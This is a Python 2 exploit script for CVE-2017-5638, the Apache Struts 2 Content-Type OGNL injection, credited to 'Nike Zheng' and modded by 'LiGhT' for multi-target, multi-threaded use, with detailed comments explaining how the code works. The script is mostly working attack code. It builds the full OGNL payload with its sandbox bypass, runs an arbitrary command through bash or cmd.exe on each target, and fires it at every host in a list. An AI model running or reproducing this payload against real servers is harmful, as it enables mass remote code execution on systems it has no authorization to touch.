#!/usr/bin/python
# CVE-2017-5638 (Apache Struts 2 bulletin S2-045): OGNL injection through the
# Jakarta Multipart parser's handling of a malformed Content-Type header.
# Affects Struts 2.3.5-2.3.31 and 2.5-2.5.10; fixed in 2.3.32 / 2.5.10.1.
# Modded By: LiGhT
# Added multi-target and multi-threading
# Original By: Nike Zheng
# Source: http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html
# P.S. You can't be an idiot -- the loop at the bottom fires a remote command at
# every host in the list, so use it only against systems you are explicitly
# authorized to test.
import sys, os, threading, time, re
import urllib2, requests, httplib
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every request below is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning; this silences it globally. (os, time, re and urllib2
# are imported but not used anywhere in the code shown.)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Python 2 script (print statements, ``except X, e`` syntax in exploit()).
# argv[1] is a file with one target per line, argv[2] the command to run.
if len(sys.argv) < 3:
    print "Apache Struts (CVE-2017-5638) RCE Exploit\n"
    print "Usage: python "+sys.argv[0]+" <List.txt(ips/sites)> <cmd>"
    print "\nExample: python "+sys.argv[0]+" sites.txt whoami"
    sys.exit()
# Target list. readlines() keeps each line's trailing newline, and the file
# handle is never closed (no ``with``); both are left as they are here.
hacks = open(sys.argv[1], "r").readlines() #list of ips or sites
# Only argv[2] is taken, so a command containing spaces must be quoted on the
# shell. It is spliced unquoted into an OGNL string literal in exploit(), so a
# single quote inside it breaks the expression rather than executing.
cmd = str(sys.argv[2]) #command to execute
def exploit(url):
    """Fire one CVE-2017-5638 request at ``url`` and print the result.

    The OGNL expression built below is sent as the Content-Type header. On a
    vulnerable Struts 2 instance it (1) installs DEFAULT_MEMBER_ACCESS as the
    active MemberAccess, either by assigning #_memberAccess directly or, when
    that name is absent, by emptying OgnlUtil's excluded-class/package lists
    and calling setMemberAccess on the context; (2) runs the module-level
    ``cmd`` through ProcessBuilder -- ``cmd.exe /c`` when the target's os.name
    contains "win", ``/bin/bash -c`` otherwise, stderr merged into stdout --
    and (3) copies the process output straight into the servlet response
    stream.

    Nothing here distinguishes a vulnerable host from a patched one: the reply
    is printed either way. On the normal path ``request`` is the requests
    Response object, so what is printed is its repr (e.g. ``<Response [200]>``),
    not the body; only the IncompleteRead fallback prints raw partial bytes.
    """
    payload = "Content-Type:%{(#_='multipart/form-data')."
    # Sandbox bypass: #_memberAccess ? assign it : (fetch OgnlUtil from the
    # action context's container, clear both exclusion lists, setMemberAccess).
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # ``cmd`` goes into the OGNL string literal with no escaping; a single
    # quote in it terminates the literal and breaks the expression.
    payload += "(#cmd='%s')." % cmd
    # Shell is chosen from os.name on the *target*; redirectErrorStream(true)
    # merges stderr into the stream copied below.
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    # Process output is written directly into the HTTP response body.
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    try:
        # verify=False: certificate errors on https targets are ignored.
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = requests.get(url, headers=headers,verify=False)
    except httplib.IncompleteRead, e:
        # Stream closed mid-body; keep whatever arrived (e.partial is bytes).
        # NOTE(review): newer requests versions wrap httplib.IncompleteRead in
        # requests.exceptions.ChunkedEncodingError, so this branch may never
        # match there -- confirm against the installed version.
        request = e.partial
    # Any other exception (connection refused, invalid URL, timeout) is not
    # caught; it propagates and ends this worker thread with a traceback.
    print request
# One thread per target with no concurrency cap and no join(): the main
# thread falls off the end after spawning, and the non-daemon workers keep
# the process alive until each request finishes or dies.
for url in hacks:
    try:
        # Substring test, not a prefix test: an "https://..." entry does not
        # contain "http://", so it gets "http://" prepended as well. Each line
        # still carries its trailing newline from readlines(), so the string
        # handed to exploit() ends in "\n/" -- whether requests accepts that
        # is not established here.
        if "http://" not in url:
            url = "http://"+url+"/"
        else:
            url = url+"/"
        strut = threading.Thread(target=exploit, args=(url,))
        strut.start()
    except:
        # Only errors from constructing/starting the thread land here.
        # Exceptions raised inside exploit() occur on the worker thread and
        # are not caught by this handler.
        pass